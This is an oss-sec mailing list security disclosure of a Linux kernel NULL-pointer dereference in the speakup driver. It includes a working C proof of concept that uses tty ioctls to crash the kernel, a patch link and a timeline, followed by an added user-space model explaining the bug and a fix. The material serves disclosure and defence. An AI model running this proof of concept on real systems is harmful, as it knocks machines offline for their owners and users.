oss-sec mailing list archives

Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2


From: Shisong Qin <qinshisong1205 () gmail com>
Date: Mon, 7 Dec 2020 10:20:44 +0800

Hi,

Recently we found another NULL-ptr deref BUG in spk_ttyio.c in the latest
Linux kernel (5.9.11 was the latest at that time). In the
spk_ttyio_receive_buf2() function, it would dereference spk_ttyio_synth
without checking whether it is NULL or not, and may lead to a NULL-ptr
deref crash.

This bug could be reproduced in the Linux kernel (e.g. 5.9.11) with
CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y, and here is a
simple poc:

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Argument for TIOCLINUX subcode TIOCL_SETSEL (layout of struct tiocl_selection) */
#pragma pack(1)
typedef struct {
        char subcode;
        short xs, ys, xe, ye;
        short sel_mode;
} sel_struct;

int main(int argc, char const *argv[]) {

    int disc = 0x1a;                       /* N_SPEAKUP (26) */
    int fd = open("/dev/tty1", 0, 0);
    if (fd < 0) {
        perror("open /dev/tty1");
        return 1;
    }
    /* TIOCSETD: attach the speakup line discipline to a tty speakup did not open itself */
    ioctl(fd, 0x5423, &disc);

    sel_struct sel;
    sel.subcode = 2;                       /* TIOCL_SETSEL: define a console selection */
    sel.xs = sel.ys = sel.xe = sel.ye = 0;
    sel.sel_mode = 0x0; /* sel_mode = 0x0/0x1/0x2 could trigger this NULL-ptr dereference bug */
    ioctl(fd, 0x541c, &sel);               /* TIOCLINUX */
    char data = 3;                         /* TIOCL_PASTESEL: paste the selection into the tty,
                                              which feeds the ldisc receive path */
    ioctl(fd, 0x541c, &data);
    return 0;
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea

Timeline:
* 2020/11/24 - Vulnerability reported to security () kernel org
* 2020/11/29 - Vulnerability confirmed, and reported to linux-distros () vs openwall org.
* 2020/12/7 - Vulnerability opened.

Thanks, Shisong Qin and Bodong Zhao, Tsinghua University
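The following is an added user-space model of the trust-boundary problem the report describes; it is not kernel code and not part of the original post. It is a constructed toy: speakup_tty, spk_ttyio_synth, ldisc open and receive_buf2 are modelled as plain C state, the crash is reported as a sentinel value instead of faulting, and the "guarded" open variant assumes the fix pattern of refusing the line discipline on any tty other than the one speakup opened itself (an assumption about the linked commit, not text from this page). The point it shows is that the receive callback relies on state only the driver's own open path sets, while TIOCSETD lets an unprivileged console user attach the discipline to an arbitrary tty.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed model of the state involved in the report; not kernel code.
 * Names mirror the driver but the structs are toys. */
struct spk_synth {
    const char *name;
    int chars_received;
};

struct tty_struct {
    int index;               /* tty number, e.g. 1 for /dev/tty1 */
    void *disc_data;         /* per-ldisc private data once the ldisc is attached */
};

/* Driver-global state: NULL until speakup itself opens a tty and binds a synth. */
static struct tty_struct *speakup_tty;
static struct spk_synth *spk_ttyio_synth;

enum outcome {
    OUTCOME_CONSUMED = 0,     /* bytes delivered to a bound synth */
    OUTCOME_ATTACH_REFUSED,   /* ldisc open rejected (hardened path) */
    OUTCOME_NULL_DEREF        /* receive path would dereference spk_ttyio_synth == NULL */
};

/* Vulnerable shape: ldisc open accepts any tty, as the report describes for 5.9.11. */
static int ldisc_open_unguarded(struct tty_struct *tty)
{
    tty->disc_data = tty;    /* some non-NULL private data; the synth itself stays NULL */
    return 0;
}

/* Hardened shape (assumed fix pattern): only the tty speakup opened may carry this
 * line discipline. -1 stands in for -EPERM. */
static int ldisc_open_guarded(struct tty_struct *tty)
{
    if (tty != speakup_tty)
        return -1;
    tty->disc_data = tty;
    return 0;
}

/* Model of spk_ttyio_receive_buf2: reports what would happen instead of crashing. */
static enum outcome receive_buf2(struct tty_struct *tty, const unsigned char *cp, int count)
{
    (void)tty;
    if (spk_ttyio_synth == NULL)
        return OUTCOME_NULL_DEREF;   /* in the real driver this is the KASAN-reported crash */
    for (int i = 0; i < count; i++) {
        (void)cp[i];
        spk_ttyio_synth->chars_received++;
    }
    return OUTCOME_CONSUMED;
}

/* Replays the PoC sequence (TIOCSETD, then a paste into the tty) against one of the two
 * open variants. No synth has been bound, as when speakup is built in but idle. */
enum outcome replay_poc(int guarded)
{
    struct tty_struct tty1 = { .index = 1, .disc_data = NULL };
    static const unsigned char pasted[] = "x";
    int rc;

    speakup_tty = NULL;
    spk_ttyio_synth = NULL;

    rc = guarded ? ldisc_open_guarded(&tty1) : ldisc_open_unguarded(&tty1);
    if (rc != 0)
        return OUTCOME_ATTACH_REFUSED;

    return receive_buf2(&tty1, pasted, 1);
}

/* The normal path: the tty speakup opened itself, with a synth bound, under the guard. */
enum outcome replay_legitimate(void)
{
    static struct spk_synth synth = { .name = "model-synth", .chars_received = 0 };
    static struct tty_struct synth_tty = { .index = 64, .disc_data = NULL };
    static const unsigned char from_synth[] = "ok";

    speakup_tty = &synth_tty;
    spk_ttyio_synth = &synth;
    synth.chars_received = 0;

    if (ldisc_open_guarded(&synth_tty) != 0)
        return OUTCOME_ATTACH_REFUSED;
    return receive_buf2(&synth_tty, from_synth, 2);
}

int main(void)
{
    printf("unguarded open, no synth: %d\n", replay_poc(0));      /* 2: would NULL-deref */
    printf("guarded open,   no synth: %d\n", replay_poc(1));      /* 1: attach refused */
    printf("guarded open, own tty:    %d\n", replay_legitimate()); /* 0: consumed */
    return 0;
}
```

The guard sits at attach time rather than inside the receive callback on purpose: checking spk_ttyio_synth for NULL in receive_buf2 alone would stop this crash but still let any console user hold the discipline on a tty the driver never meant to serve, which is the condition a defender wants to rule out.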
